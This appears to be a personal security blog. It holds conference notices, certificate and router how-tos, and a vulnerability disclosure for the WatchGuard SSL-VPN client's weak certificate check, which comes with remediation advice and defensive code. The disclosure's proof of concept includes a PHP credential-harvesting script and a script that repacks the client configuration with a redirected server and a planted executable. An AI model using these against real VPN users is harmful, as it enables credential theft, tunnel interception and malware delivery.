
Security


BruCON Call For Papers

2009 saw the first edition of BruCON, a non-profit conference meant to bring together the people in and around Belgium interested in discussing computer security, privacy and related technology topics. It was a great first edition, thanks to the sponsors and the many volunteers.

I'm happy that I'll be able to play a (more significant) role in the organization of the second edition.

Do you have an interesting topic to present or a cool workshop? Have a look at the Call for Papers here.

One week before HAR

In just a week the long-awaited HAR conference takes place. Time for a short overview:

  • Tickets are unfortunately no longer available; don't bother coming to the event without one, as there will be no door sales. Next time, plan your holiday a little earlier.
  • If you arrive early and want to help with the build-up, simply create your wiki profile page from the volunteer template; your arrival date will automatically appear on the volunteers page. Lending a hand is a great way to have fun and meet very interesting people.
  • As always, we Belgians group together. This year Belhack (the belsec people and the former Iguana colony) and Hacker Space Brussels join forces. If you prefer a less calm place, join the Belgian Embassy, which has a noisier reputation.
  • Print your ticket, don't forget your tent, prepare and harden your computer and phone, stop worrying, and get ready to enjoy your stay.

Oh, last but not least: You will probably see many BruCON people. Did you already book that ticket?

Watchguard Fireware SSL-VPN Vulnerability

I talked a few times about this issue, but unfortunately I didn't get a response to my CVE number request. So here's the full thing:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Security Advisory
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: High
     Title: Watchguard Fireware SSL-VPN MiTM Multiple Vulnerabilities
      Date: November 29, 2008
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 * Project: WatchGuard Firewall SSL-VPN
 * Version affected: 
            WatchGuard Fireware 10.0 up to 10.2.2 
            WatchGuard Mobile VPN with SSL 10.0 for Macintosh
            WatchGuard Mobile VPN with SSL 10.0.2 for Macintosh
            WatchGuard Mobile VPN with SSL 10.0 for Windows

 * Discovered:  April 06, 2008
 * Reported  :  April 08, 2008
 * Fixed     :  October 07, 2008  (only for Windows)
 * Advisory  :  November 29, 2008

 * Not Fixed :  Mobile VPN with SSL for Macintosh
 
 * Security risk: High Severity
 * Vulnerability: MiTM Multiple Vulnerabilities with Arbitrary Code Execution

 * Discovered by: Christophe Vandeplas <christophe@vandeplas.com>

 
-------- SHORT DESCRIPTION --------
Due to a design flaw in the 'WatchGuard Mobile VPN with SSL Client'
it is vulnerable to a man-in-the-middle (MiTM) attack with multiple
consequences:
- Username and password gathering
- OpenVPN configuration poisoning
- Upload of malware to the victim's machine
- Redirection to another VPN server
- Fully transparent MiTM of the complete VPN tunnel
- Arbitrary code execution on the victim's machine

This vulnerability should be classed as high severity.

-------- REMEDIATION --------

Windows users should update the client software as soon as possible.
Stop using the client on Macintosh computers until WatchGuard
releases a fixed Macintosh version.

-------- FULL DESCRIPTION --------

-- [ How the Watchguard Fireware SSL-VPN Works

The Watchguard SSL-VPN system consists of four parts:
- OpenVPN Client
- WatchGuard Mobile VPN with SSL GUI Client (or Watchguard GUI Client)
- OpenVPN Server
- Webserver where the client-configuration resides (port 4100)

The OpenVPN client and server set up the VPN tunnel itself. For
authentication the 'auth-user-pass', server-certificate and
client-certificate mechanisms are used, which is good practice.
The WatchGuard GUI client has two tasks: it is the management
interface in which the user enters the OpenVPN credentials, and it
downloads the client configuration from the webserver on port 4100.
That webserver uses SSL for encryption, with a self-signed
certificate.

-- [ The Flow:

The WatchGuard GUI client needs the Firebox IP, a username and a
password. When the user clicks 'Connect' the GUI client opens an SSL
connection to the webserver on ip:4100 and downloads the file
'client.wgssl' with the following HTTP GET, credentials in the
query string:
GET /?action=sslvpn_download&username=testuser&password=testpass&filename=client.wgssl
The downloaded 'client.wgssl' is a gzipped tar archive (TGZ) that
contains the following files:
MD5SUM      - Checksums of the other files in the wgssl package
VERSION     - Version information from WatchGuard
ca.crt      - Certificate authority certificate (public key)
client.crt  - Client certificate (public key)
client.ovpn - OpenVPN configuration file
client.pem  - Private key of the client

The WatchGuard GUI client extracts these files and starts OpenVPN
with this configuration. OpenVPN then sets up the VPN tunnel; when
the username and password are required it asks the GUI client for
them over the OpenVPN management interface, and the tunnel comes up.

-- [ The problem:

The problem lies in the way the GUI client downloads the
configuration. The webserver on port 4100 uses a self-signed
certificate, and the client never validates that certificate
properly. It only compares the strings in the following subject
fields:
Common Name (CN)         = Fireware Web Server
Organization (O)         = Watchguard
Organizational Unit (OU) = Fireware

These checks are insufficient: nothing in them is tied to a key the
attacker does not have. A full certificate validation should be
performed, either against the server certificate imported manually
before the first connection (pinning) or against an imported CA
certificate, together with a check that the certificate belongs to
the host or IP the client connects to.

This results in:
1) Anyone can generate a certificate with these values. An attacker
   can run a webserver and impersonate the original SSL-VPN server.
2) The password is sent in clear text in the query string of the GET
   request, so it ends up in the impersonating server's access log.
3) The checks on the content of client.wgssl are almost nil: the
   existing client configuration can be completely replaced, and
   extra files can be dropped into the configuration directory on
   the client machine.
4) The client can be redirected to another VPN server. Since the
   attacker controls the whole configuration, the full VPN tunnel
   can be MiTM-ed without the user noticing.
5) Combined with the 'up cmd' option of the OpenVPN configuration
   file, arbitrary code can be executed on the victim's machine.
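The following is an added example, not WatchGuard's code and not part of the advisory: it puts the subject-string check described above next to a client that only sends the credentials after the server has proven its identity. The check uses the subject layout that Python's ssl module returns from getpeercert(); the attacker subject and the DER blobs are constructed for the example, and the CA file, hostname and pinned fingerprint passed to download_config() are assumptions about the deployment.

```python
"""Added example (not WatchGuard's code): the subject-string check the advisory
describes, next to a client that verifies the certificate chain, the hostname
and optionally a pinned fingerprint before sending credentials."""
import hashlib
import hmac
import http.client
import ssl
import urllib.parse

# Subject of an attacker-issued certificate, in the layout that
# ssl.SSLSocket.getpeercert() returns: a tuple of RDNs, each a tuple of
# (attribute, value) pairs. Constructed for this example.
ATTACKER_SUBJECT = (
    (("commonName", "Fireware Web Server"),),
    (("organizationName", "Watchguard"),),
    (("organizationalUnitName", "Fireware"),),
)


def subject_fields(subject):
    """Flatten getpeercert()-style subject RDNs into a {attribute: value} dict."""
    return {attr: value for rdn in subject for attr, value in rdn}


def weak_check(subject):
    """The check the advisory describes: three string comparisons and nothing
    else. Any self-signed certificate carrying these fields passes."""
    fields = subject_fields(subject)
    return (fields.get("commonName") == "Fireware Web Server"
            and fields.get("organizationName") == "Watchguard"
            and fields.get("organizationalUnitName") == "Fireware")


def fingerprint_sha256(der_cert):
    """Hex SHA-256 over the DER encoding of a certificate."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert, pinned_sha256):
    """Constant-time comparison of the presented leaf against a pinned fingerprint."""
    return hmac.compare_digest(fingerprint_sha256(der_cert), pinned_sha256.lower())


def verified_context(cafile):
    """TLS context with full chain validation and hostname checking.
    cafile (assumed to exist) holds the CA that issued the Firebox's web
    certificate, or the Firebox's own self-signed certificate."""
    ctx = ssl.create_default_context(cafile=cafile)  # CERT_REQUIRED + check_hostname
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def download_config(host, port, username, password, cafile, pinned_sha256=None):
    """Fetch client.wgssl the way the GUI client does, but only after the
    server has proven its identity. The query-string API is the one from the
    advisory, so the credentials still land in the server's access log; that
    is why the server must be authenticated before the request goes out."""
    ctx = verified_context(cafile)
    conn = http.client.HTTPSConnection(host, port, context=ctx)
    conn.connect()  # raises ssl.SSLCertVerificationError on chain/hostname mismatch
    if pinned_sha256 is not None:
        leaf = conn.sock.getpeercert(binary_form=True)
        if not pin_matches(leaf, pinned_sha256):
            conn.close()
            raise ssl.SSLError("server certificate does not match the pinned fingerprint")
    query = urllib.parse.urlencode({
        "action": "sslvpn_download", "username": username,
        "password": password, "filename": "client.wgssl"})
    conn.request("GET", "/?" + query)
    try:
        resp = conn.getresponse()
        if resp.status != 200:
            raise RuntimeError(f"unexpected HTTP status {resp.status}")
        return resp.read()
    finally:
        conn.close()
```

weak_check() accepts the attacker's certificate because every field it looks at is chosen by whoever generates the certificate; verified_context() and pin_matches() fail for the same certificate because the attacker holds neither the CA key nor the pinned leaf.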


-------- PROOF OF CONCEPT --------

--[ Main Setup

Take an original 'client.wgssl' file, rename it to 'client.wgssl.tgz'
and extract it.
  Change the 'remote' value in 'client.ovpn' to another IP (1.1.1.1)
  and recalculate its checksum in MD5SUM.
  Copy a 'malware.exe' into the same directory (this could be any
  file: a virus, or incriminating material planted on the victim).
  Compress all files again into a new .tgz package with the original
  filename 'client.wgssl'.
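The steps above, as an added example that is not part of the original PoC: a script that rebuilds a client.wgssl bundle with a changed 'remote' and an extra file, and then shows why the MD5SUM file inside the bundle is not an integrity control (the attacker simply recomputes it). The file contents are constructed stand-ins, the md5sum(1)-style layout of MD5SUM is an assumption, and the keyed tag at the end is a stand-in for the signed manifest a fixed client would need.

```python
"""Added example (not from the advisory's PoC tooling): poison a client.wgssl
bundle and show that its own MD5SUM manifest cannot detect it. All contents
are constructed stand-ins; the MD5SUM line layout (md5sum(1) style) is assumed."""
import hashlib
import hmac
import io
import tarfile

# Constructed stand-in for the files of an original client.wgssl bundle.
ORIGINAL_FILES = {
    "VERSION": b"constructed version stamp\n",
    "ca.crt": b"constructed placeholder for the CA certificate\n",
    "client.crt": b"constructed placeholder for the client certificate\n",
    "client.pem": b"constructed placeholder for the client private key\n",
    "client.ovpn": (b"client\n"
                    b"dev tun\n"
                    b"proto tcp-client\n"
                    b"remote 203.0.113.10 443\n"
                    b"ca ca.crt\n"
                    b"cert client.crt\n"
                    b"key client.pem\n"
                    b"auth-user-pass\n"),
}


def md5sum_manifest(files):
    """md5sum(1)-style manifest over every file except MD5SUM itself (assumed layout)."""
    lines = [f"{hashlib.md5(data).hexdigest()}  {name}"
             for name, data in sorted(files.items()) if name != "MD5SUM"]
    return ("\n".join(lines) + "\n").encode()


def pack_wgssl(files):
    """Build the gzipped tar the GUI client expects, regenerating MD5SUM."""
    files = dict(files)
    files["MD5SUM"] = md5sum_manifest(files)
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def unpack_wgssl(blob):
    """Extract the bundle into a {name: bytes} dict."""
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        return {m.name: tar.extractfile(m).read() for m in tar.getmembers() if m.isfile()}


def manifest_is_consistent(files):
    """The only integrity check the bundle carries: does MD5SUM match the files?"""
    return files.get("MD5SUM") == md5sum_manifest(files)


def remote_host(files):
    """Host of the first 'remote' line in client.ovpn."""
    for line in files["client.ovpn"].decode().splitlines():
        parts = line.split()
        if parts and parts[0] == "remote":
            return parts[1]
    return None


def poison_wgssl(blob, new_remote, extra_files):
    """What the PoC does by hand: point 'remote' elsewhere, drop in extra
    files, repack. pack_wgssl() recomputes MD5SUM, so the manifest still matches."""
    files = unpack_wgssl(blob)
    lines = []
    for line in files["client.ovpn"].decode().splitlines():
        parts = line.split()
        if parts and parts[0] == "remote":
            parts[1] = new_remote  # keep the port and any options that follow
            line = " ".join(parts)
        lines.append(line)
    files["client.ovpn"] = ("\n".join(lines) + "\n").encode()
    files.update(extra_files)
    return pack_wgssl(files)


def keyed_manifest_tag(files, key):
    """Stand-in for a signature the client verifies with a key it already
    trusts: an HMAC over the manifest, which an attacker without the key cannot
    regenerate after tampering. (A real fix would be an asymmetric signature
    checked against a pinned public key; HMAC keeps the example self-contained.)"""
    return hmac.new(key, md5sum_manifest(files), hashlib.sha256).hexdigest()
```

Because MD5SUM is computed from the files it travels with, manifest_is_consistent() returns True for the poisoned bundle just as it does for the original; only a tag bound to a key the attacker lacks (keyed_manifest_tag) changes.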

An Apache webserver was configured to listen on port 4100 with
SSLEngine on.
The SSL certificate was generated with the following subject values:
  Common Name (CN)         = Fireware Web Server
  Organization (O)         = Watchguard
  Organizational Unit (OU) = Fireware
In the webroot of the webserver we uploaded a small script that
saves the query parameters into a database and returns the modified
client.wgssl file as a data stream (see PHP Sample Script).

-- [ Connect

Now open the WatchGuard GUI client and connect to the IP of the
attacker's webserver (192.168.1.110).
The client downloads the new 'client.wgssl' file and extracts it.

-- [ Results:

1) The WatchGuard GUI accepts the fake certificate.
2) The Apache log shows a successful download of the configuration
   file, with the username and password in the request line:
   192.168.1.120 - - [08/Apr/2008:19:06:14 +0200] "GET /?action=sslvpn_download&username=testuser&password=testpass&filename=client.wgssl HTTP/1.1" 200 12 "-" "-"
   These usernames and passwords can be stored in a database with a
   PHP script (see PHP Sample Script).

3a) The client configuration is completely replaced by our own
    configuration file.
3b) The 'malware.exe' file now sits in the WatchGuard GUI client
    directory.

4a) The logging shows that the client no longer connects to
    192.168.1.110 but to 1.1.1.1.
4b) Out of scope of this PoC.
5) Out of scope of this PoC.

-------- Technical SOLUTIONS for Watchguard --------

The WatchGuard Mobile VPN with SSL client should validate the SSL
certificate of the configuration website on port 4100 according to
the standards (chain validation against a trusted CA or a pinned
certificate, plus a check of the host or IP it connects to) instead
of comparing three subject strings.

The WatchGuard firewall should let the administrator generate and
upload certificates and bind them to its webservers.
An even better solution would be to run both OpenVPN and the
configuration website on the same port with the same certificate.
OpenVPN 2.1 and later support 'port-share', which lets the OpenVPN
server (in TCP mode) hand connections that are not OpenVPN traffic
to a webserver or other service behind the same port.
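The following is an added example of that port-sharing setup, not a configuration from WatchGuard or from the advisory: an OpenVPN 2.1 server configuration that owns TCP port 443 and proxies everything that is not OpenVPN traffic to a configuration webserver bound to 127.0.0.1:4100. File names and addresses are assumptions. Note what this does and does not fix: the webserver can now present the same certificate as the OpenVPN server, so a client that already holds ca.crt can validate it, but a client that still only compares subject strings is as exposed as before, and the very first download (before the client has ca.crt) still needs a trust anchor such as a pinned fingerprint.

```conf
# Added example, not WatchGuard's configuration.
# port-share only works with proto tcp-server, and the webserver
# must listen on 127.0.0.1:4100 only, not on the public address.
port 443
proto tcp-server
dev tun
# Same certificate and CA the configuration webserver presents (assumed file names)
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
# Non-OpenVPN connections on port 443 are proxied to the webserver
port-share 127.0.0.1 4100
```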


-------- PHP Sample Script --------
<?php
// Harvest the credentials the GUI client puts in the query string.
// The PoC stored them in a database; appending them to a log file
// keeps this sample self-contained.
$user = isset($_GET['username']) ? $_GET['username'] : '';
$pass = isset($_GET['password']) ? $_GET['password'] : '';
file_put_contents('harvested.log', date('c') . " $user:$pass\n", FILE_APPEND);

// Return the (modified) client.wgssl bundle as a download.
$file = 'client.wgssl';
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="client.wgssl"');
header('Content-Length: ' . filesize($file));
readfile($file);
?>


-------- LINKS --------
- Watchguard Release Notes
https://www.watchguard.com/Download/Files/WSM/10_2_3/EN_ReleaseNotes_WSM... 

- OpenVPN 2.1 Manual
http://openvpn.net/index.php/documentation/manuals/openvpn-21.html

ModSecurity Console signed ssl certificate

HOWTO make the ModSecurity Console work with a CA-signed certificate:

Import the CA certificates / certificate chain

Place the certificate of each Certificate Authority in the chain in its own file (one file per item in the chain), and import them with the following commands:

[servername]$ keytool -v -import -trustcacerts -keystore keystore \
   -file ../cacert1.txt -alias "ca1"
[servername]$ keytool -v -import -trustcacerts -keystore keystore \
   -file ../cacert2.txt -alias "ca2"

When prompted for a password, enter: password

Create the private key:

First we generate the private key.
[servername]$  keytool -genkeypair -alias "mykey" -keystore keystore \
   -validity 1825 -keyalg RSA -keysize 2048
Enter keystore password: password  (not shown while typing)
Re-enter new password: password  (not shown while typing)
What is your first and last name?
  [Unknown]:  modseccon.home.vandeplas.com
What is the name of your organizational unit?
  [Unknown]:
What is the name of your organization?
  [Unknown]:  Home
What is the name of your City or Locality?
  [Unknown]:
What is the name of your State or Province?
  [Unknown]:
What is the two-letter country code for this unit?
  [Unknown]:  BE
Is CN=modseccon.home.vandeplas.com, OU=Unknown, O=Home, L=Unknown, ST=Unknown, C=BE correct?
  [no]:  yes
 
Enter key password for <mykey>
     (RETURN if same as keystore password):

Generate a CSR:

The CSR (Certificate Signing Request) is what you send to the Certificate Authority. The authority will need to confirm that you own the domain name specified in it.

[servername]$ keytool -certreq -v -keystore keystore -alias "mykey"
Enter keystore password: password  (not shown while typing)

Copy and paste the CSR that keytool prints (including the BEGIN and END lines) into a file and have it signed by the Certificate Authority. Then wait for the signed certificate.

Import Signed Certificate in keytool:

Copy and paste the signed certificate (including the BEGIN and END lines) into a file such as signedcert.txt.
Then import it into the keystore under the same alias as the key pair:

[servername]$ keytool -v -import -trustcacerts -keystore keystore \
   -file ../signedcert.txt -alias "mykey"

(If you get an error about the certificate chain, the CA certificates were not imported correctly. A successful import reports that the certificate reply was installed in the keystore; the entry should then carry the full chain, which keytool's -list -v output shows as a chain length greater than 1.)

Copy the keystore to the right location:

Make sure the ModSecurity Console is not running.
[servername]$ cp keystore ./templates/com.thinkingstone.console.ConsoleComponent/ssl/keystore
[servername]$ cp keystore ./var/data/main/console/ssl/keystore

Start up ModSecurity Console and enjoy your https website!

Hacking for Beer - BruCON 12 days left for early bird tickets

BruCON is an annual two-day conference by and for the security and hacker community. The conference offers lectures and workshops on a multitude of topics such as computer security, privacy, information technology and its implications for society. It takes place at the Surfhouse in Brussels, Belgium, on September 18 and 19.

Tickets should be purchased as soon as possible, because from the 1st of July the price rises from €180 to €250. The staff didn't forget students! Their price is €50 until the 1st of July.

Besides presentations on IPv6 security, MPLS hacking, cyberwarfare, social engineering techniques, cloud computing security, open source information gathering, the dangers of social networks, and much more, there will be interesting workshops and other events.

Unfortunately I won't be able to go as I'll be in Canada because of a wedding. But count me in for the second edition!

Sharing safely your internet connection with dd-wrt and multiple SSIDs.

For some time I've been a strong promoter of free internet everywhere. Nobody can deny how practical it is to take your laptop or phone and browse the web without an extra UMTS/3G subscription.

On the principle that you can't get what you don't give, I've been sharing my internet for a few years. For simplicity (and laziness) I did it the dirty way: two wireless SSIDs, one WPA2 and one unencrypted, connected to the same LAN. My own traffic was fully encrypted from the laptop to the AP, but anonymous visitors had full access to my network. It was not something I really liked.

As I just moved in and have brand new internet it was time to configure this correctly.
The plan is the following:

  • Create two networks: one private, one public
  • The networks should not be able to communicate
  • Don't buy extra hardware (aka use only my Linksys)
Note: Ignore the references to vlan2 in the screenshots. They are there because I connected the public network to a physical port of my router for testing purposes.

Change firmware to DD-WRT

I did this a long time ago, but if you didn't do it yet check out the official DD-WRT website for the firmware and manuals.

The two SSIDs

In the Wireless > Basic Settings page click on Add in the Virtual Interfaces section. Your newly created interface will have the name wl0.1. The primary wireless is still called wl0.

(Screenshot: Wireless virtual interfaces)

Don't forget to configure encryption on your primary wireless in the Wireless > Wireless Security page.

(Screenshot: Wireless security)

Splitting the private and public network

On the Setup > Networking page create a bridge called br2 and give it the router's IP address in the public network. This must be a different subnet from your private network (the firewall rules below use 192.168.107.0/24 for it). Apply Settings.

(Screenshot: Network bridge)

In the Assign to Bridge section of the same page click on Add, choose br2 and then wl0.1. Apply Settings.

(Screenshot: Network bridge interface assignment)

Activating a DHCP on the public network

At the bottom of the Setup > Networking page you can add another DHCP server. Make sure it is attached to the br2 interface, so that visitors get an address in the public subnet and not in your private one.

(Screenshot: DHCP server)

Firewall changes

We need to add a few rules to the firewall to allow and block traffic.
To make sure they are applied at boot, I added the following rules under Administration > Commands in the web interface and saved them as the firewall script.

iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD
iptables -I FORWARD -i br2 -o ppp0 -s 192.168.107.0/24 -j ACCEPT
iptables -I FORWARD -i br0  -j ACCEPT
iptables -I INPUT -i br2 -p udp --dport 67:68 --sport 67:68 -j ACCEPT
iptables -I INPUT -i br2 -p udp --dport 53 -j ACCEPT
iptables -I INPUT -i br0 -j ACCEPT
iptables -I OUTPUT -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -P OUTPUT DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP

Now is the time to test everything. Connect to your private network and browse the web. Then join the free-internet SSID and try the same. Try connecting to a host in your private network; this should not work. Also try the router's web interface from the public SSID: the INPUT chain only lets DHCP and DNS in from br2, so it should be unreachable. Two things to check for your own setup: ppp0 is the WAN interface of a PPPoE uplink, so replace it with whatever your WAN interface is called if your provider uses DHCP or a static address; and because the script flushes the built-in chains, DD-WRT's own default rules are gone, so every service you still want reachable has to be covered here.
It's not a bad idea to reboot your router once more, just to be certain everything comes back correctly the day you have a power outage.
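Because the rules only come to life on the router, the effective order is easy to get wrong: -I inserts at the top of the chain, so the inserted rules end up in the reverse order of the script, and -A appends after them. The following is an added example, not part of the post and not DD-WRT tooling: a small Python model of the iptables semantics this script relies on (first match wins, -I inserts as rule 1, -A appends, -P sets the policy) that replays the script verbatim and answers "what happens to this packet" for the cases the post says to test by hand. It models only the matches the script uses (-i, -o, -s, -p, --dport, --sport, -m state) and ignores the nat table; the packets are constructed.

```python
"""Added example: offline model of the DD-WRT iptables script from this post.
Models only the matches the script uses; not DD-WRT code."""
import ipaddress
import shlex
from dataclasses import dataclass
from typing import Optional

# The firewall script from the post, verbatim.
RULES_SCRIPT = """
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD
iptables -I FORWARD -i br2 -o ppp0 -s 192.168.107.0/24 -j ACCEPT
iptables -I FORWARD -i br0  -j ACCEPT
iptables -I INPUT -i br2 -p udp --dport 67:68 --sport 67:68 -j ACCEPT
iptables -I INPUT -i br2 -p udp --dport 53 -j ACCEPT
iptables -I INPUT -i br0 -j ACCEPT
iptables -I OUTPUT -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -P OUTPUT DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP
"""


@dataclass
class Packet:
    """Constructed test packet: interfaces, source, protocol, ports, conntrack state."""
    in_if: Optional[str] = None
    out_if: Optional[str] = None
    src: str = "0.0.0.0"
    proto: Optional[str] = None
    dport: Optional[int] = None
    sport: Optional[int] = None
    state: str = "NEW"


@dataclass
class Rule:
    target: str
    in_if: Optional[str] = None
    out_if: Optional[str] = None
    src: Optional[ipaddress.IPv4Network] = None
    proto: Optional[str] = None
    dport: Optional[tuple] = None  # (low, high)
    sport: Optional[tuple] = None
    states: Optional[frozenset] = None

    def matches(self, p: Packet) -> bool:
        def in_range(rng, port):
            return rng is None or (port is not None and rng[0] <= port <= rng[1])
        return ((self.in_if is None or p.in_if == self.in_if)
                and (self.out_if is None or p.out_if == self.out_if)
                and (self.proto is None or p.proto == self.proto)
                and (self.src is None or ipaddress.ip_address(p.src) in self.src)
                and in_range(self.dport, p.dport) and in_range(self.sport, p.sport)
                and (self.states is None or p.state in self.states))


def _port_range(spec):
    low, _, high = spec.partition(":")
    return (int(low), int(high or low))


class Firewall:
    def __init__(self):
        self.chains = {c: [] for c in ("INPUT", "OUTPUT", "FORWARD")}
        self.policies = {c: "ACCEPT" for c in self.chains}  # iptables default

    def run(self, line):
        argv = shlex.split(line)
        if not argv or argv[0] != "iptables":
            return
        op, chain = argv[1], argv[2]
        if op == "-F":
            self.chains[chain].clear()
        elif op == "-P":
            self.policies[chain] = argv[3]
        elif op == "-I":  # no position given: insert as rule 1
            self.chains[chain].insert(0, self._parse(argv[3:]))
        elif op == "-A":
            self.chains[chain].append(self._parse(argv[3:]))
        else:
            raise ValueError(f"unsupported operation {op}")

    @staticmethod
    def _parse(args):
        kw, it = {}, iter(args)
        for flag in it:
            if flag == "-m":  # match-extension name; only 'state' occurs here
                next(it)
                continue
            value = next(it)
            if flag == "-i": kw["in_if"] = value
            elif flag == "-o": kw["out_if"] = value
            elif flag == "-p": kw["proto"] = value
            elif flag == "-s": kw["src"] = ipaddress.ip_network(value)
            elif flag == "--dport": kw["dport"] = _port_range(value)
            elif flag == "--sport": kw["sport"] = _port_range(value)
            elif flag == "--state": kw["states"] = frozenset(value.split(","))
            elif flag == "-j": kw["target"] = value
            else: raise ValueError(f"unsupported match {flag}")
        return Rule(**kw)

    def decide(self, chain, packet):
        """First matching rule wins; otherwise the chain policy applies."""
        for rule in self.chains[chain]:
            if rule.matches(packet):
                return rule.target
        return self.policies[chain]


def load(script=RULES_SCRIPT):
    fw = Firewall()
    for line in script.splitlines():
        fw.run(line)
    return fw


if __name__ == "__main__":
    fw = load()
    print("public -> private:", fw.decide("FORWARD", Packet("br2", "br0", "192.168.107.20", "tcp", 445)))
    print("public -> router web UI:", fw.decide("INPUT", Packet("br2", None, "192.168.107.20", "tcp", 80)))
```

The model confirms the two properties the post wants: new connections from br2 only pass when they leave via ppp0 with a source in 192.168.107.0/24 (spoofed sources are dropped), and the only things br2 clients can ask the router itself for are DHCP and DNS. It also shows that the `-i br0` rule sits first in FORWARD and INPUT, so the private side is never restricted.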

Consequences

Opening your internet connection to outsiders has a few consequences. Here is an (incomplete) list:

  • Download limits: a visitor can generate a ton of traffic on your account. Make sure your limits are not too low. I've never had issues with this.
  • Limited speed: someone else can slow down your internet. I've never had issues with this. You could mitigate it with the QoS features of DD-WRT.
  • Illegal behavior: people could use your connection for illegal activities.

To protect myself from the illegal activities I plan to set up a portal page using the NoCatSplash feature of DD-WRT. I also plan to log every MAC address that connects to my wireless, with a timestamp.

Installing BackTrack 4 beta on a USB disk

You might have noticed that BackTrack 4 Beta has been out for a few days. Since it brings some interesting new features I decided to upgrade/reinstall my BT3 USB stick to the latest edition.

For Linux users there is a quick install guide that lists the commands needed to set up the system.
Having only a Windows system at hand at that moment, I had to follow another procedure. The easiest way is the following:

  1. First format your partition as FAT32. Windows refuses to format partitions bigger than 32GB as FAT32 in the GUI (to push users towards NTFS). It's only a GUI limitation, so you can still use the command line: format d: /fs:fat32.
  2. Now download UNetbootin, a kind of assistant that installs ISOs to your USB disk. (Thanks for the tip, Security4all.)
  3. In UNetbootin choose Diskimage and specify the path to the BT4 beta ISO file.
  4. For the Type I had to choose manual, as UNetbootin didn't detect my disk as a USB disk.
  5. Just press the OK button and wait.

I noticed that no bootloader had been installed on the USB disk, so I had to do this manually. It's fairly simple:
Browse to the disk on your computer and run the d:\boot\bootinst.bat script. The script tries to autodetect the drive letter and asks for confirmation. Double-check it before confirming: the script writes a boot sector to the drive it names, and the wrong letter means the wrong disk is overwritten.

Now boot your system from the USB disk and here it is: BackTrack 4 beta.
